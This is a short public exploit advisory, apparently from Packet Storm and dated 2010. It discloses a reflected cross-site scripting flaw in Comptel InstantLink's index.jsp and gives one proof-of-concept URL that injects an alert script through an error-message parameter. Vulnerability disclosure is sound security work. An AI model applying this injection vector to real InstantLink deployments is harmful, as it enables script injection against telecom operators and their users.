The Comptel InstantLink system suffers from a cross site scripting vulnerability.
126feb8bc88964d80e385256db2a9e47fedd26d6459474ab9eef67d939954928--------------------------------------------------------------------
# Exploit Title: Comptel InstantLink" XSS vulnerability
# Date: 24 Feb 2010
# Author: thebluegenius
# Software Link: http://www.comptel.com/ProvisioningActivation/
# Version: All
# CVE : NA
---------------------------------------------------
"Comptel InstantLink" XSS vulnerability.
---------------------------------------------------
By :Thebluegenius.
Email :rajsm@isac.org.in
Blog :www.thebluegenius.com.
---------------------------------------------------
Product Name: Comptel Instant Link System
Vendor :http://www.comptel.com/ProvisioningActivation/
Description:
Comptel InstantLink automates the user provisioning and service activation processes. It covers the entire provisioning workflow - from order entry to billable service.
The product suffers from XSS vulnerability. Presently this product is deployed to over 280 Telecom customers with 800+ million subscribers across the world.
------------------
Vulnerability: XSS
------------------
you can execute XSS as given below:
http://IPaddress:port/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E
-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed